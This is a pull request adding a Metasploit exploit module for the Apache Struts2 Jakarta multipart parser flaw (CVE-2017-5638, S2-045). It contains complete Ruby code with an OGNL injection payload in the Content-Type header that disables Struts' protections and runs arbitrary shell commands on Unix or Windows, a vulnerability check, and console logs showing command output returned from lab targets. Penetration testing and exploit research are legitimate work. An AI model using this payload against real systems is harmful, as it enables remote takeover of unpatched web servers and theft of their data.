### PR TITLE
[add] CVE-2017-5638 - Apache Struts2 S2-045

### DIFF
--- a/modules/exploits/multi/http/struts2_code_exec_jakarta.rb
+++ b/modules/exploits/multi/http/struts2_code_exec_jakarta.rb
@@ -1,0 +1,117 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts Jakarta Multipart Parser Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a remote code execution vunlerability in Apache Struts
+        version 2.3.5 - 2.3.31,  and 2.5 - 2.5.10. Remote Code Execution can be performed
+        via http Content-Type header.
+      },
+      'Author'         => [ 'Nixawk' ],
+      'References'     => [
+        ['CVE', '2017-5638'],
+        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']
+      ],
+      'Platform'       => %w{ unix win },
+      'Privileged'     => true,
+      'Targets'        =>
+        [
+          ['Apache Struts2 / unix', {} ],
+          ['Apache Struts2 / win', {} ]
+        ],
+      'DisclosureDate' => 'Mat 07 2017',
+      'DefaultTarget' => 0))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),
+          OptString.new('CMD', [true, 'The command to be executed in remote server', 'dir'])
+        ]
+      )
+  end
+
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def send_http_request(payload)
+    uri = normalize_uri(datastore["TARGETURI"])
+    resp = send_request_cgi(
+      'uri'     => uri,
+      'version' => '1.1',
+      'method'  => 'GET',
+      'headers' => {
+        'Content-Type': payload
+      }
+    )
+
+    if resp && resp.code == 404
+      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
+    end
+    resp
+  end
+
+  def http_send_command(cmd)
+    payload = "%{(#_='multipart/form-data')."
+    payload << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
+    payload << "(#_memberAccess?"
+    payload << "(#_memberAccess=#dm):"
+    payload << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    payload << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+    payload << "(#ognlUtil.getExcludedPackageNames().clear())."
+    payload << "(#ognlUtil.getExcludedClasses().clear())."
+    payload << "(#context.setMemberAccess(#dm))))."
+    payload << "(#cmd='#{cmd}')."
+    payload << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+    payload << "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+    payload << "(#p=new java.lang.ProcessBuilder(#cmds))."
+    payload << "(#p.redirectErrorStream(true))."
+    payload << "(#process=#p.start())."
+    payload << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+    payload << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+    payload << "(#ros.flush())}"
+    send_http_request(payload)
+  end
+
+  def check
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+
+    payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
+    payload << ".addHeader('#{var_a}', '#{var_b}')"
+    payload << "}.multipart/form-data"
+
+    begin
+      resp = send_http_request(payload)
+    rescue Msf::Exploit::Failed
+      return Exploit::CheckCode::Unknown
+    end
+
+    if resp && resp.code == 200 && resp.headers[var_a] == var_b
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::NotVulnerable, "Exploit not available on this system.")
+    end
+
+    resp = http_send_command(datastore['cmd'])
+    print_status("Command output: #{resp.body}")
+  end
+end

--- a/modules/exploits/multi/http/struts2_code_exec_jakarta.rb
+++ b/modules/exploits/multi/http/struts2_code_exec_jakarta.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['Apache Struts2 / unix', {} ],
           ['Apache Struts2 / win', {} ]
         ],
-      'DisclosureDate' => 'Mat 07 2017',
+      'DisclosureDate' => 'Mar 07 2017',
       'DefaultTarget' => 0))
 
       register_options(


### PR DESCRIPTION
https://github.com/rapid7/metasploit-framework/issues/8064

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploits/multi/http/struts2_code_exec_jakarta`
- [ ] `set TARGETURI /struts2-showcase/`
- [ ] `set CMD dir`
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not

## Unix/Linux

```
msf exploit(struts_code_exec_jakarta) > show options

Module options (exploit/multi/http/struts_code_exec_jakarta):

   Name       Current Setting     Required  Description
   ----       ---------------     --------  -----------
   CMD        ver                 yes       The command to be executed in remote server
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.206.144     yes       The target address
   RPORT      8080                yes       The target port
   SSL        false               no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-showcase/  yes       The path to a struts application action
   VHOST                          no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Apache Struts2 / unix


msf exploit(struts_code_exec_jakarta) > set CMD id
CMD => id
msf exploit(struts_code_exec_jakarta) >
msf exploit(struts_code_exec_jakarta) > run

[*] Started reverse TCP handler on 192.168.206.144:4444
[*] 192.168.206.144:8080 - Command output: uid=125(tomcat8) gid=135(tomcat8) groups=135(tomcat8)

[*] Exploit completed, but no session was created.
```

## Windows

```
msf exploit(struts_code_exec_jakarta) > show options

Module options (exploit/multi/http/struts_code_exec_jakarta):

   Name       Current Setting                     Required  Description
   ----       ---------------                     --------  -----------
   CMD        ver                                 yes       The command to be executed in remote server
   Proxies                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.206.147                     yes       The target address
   RPORT      8080                                yes       The target port
   SSL        false                               no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /2.3.15.1-showcase/showcase.action  yes       The path to a struts application action
   VHOST                                          no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   1   Apache Struts2 / win


msf exploit(struts_code_exec_jakarta2) > run

[*] Started reverse TCP handler on 192.168.206.144:4444
[*] 192.168.206.147:8080 - Command output:
Microsoft Windows [�汾 6.1.7600]

[*] Exploit completed, but no session was created.
```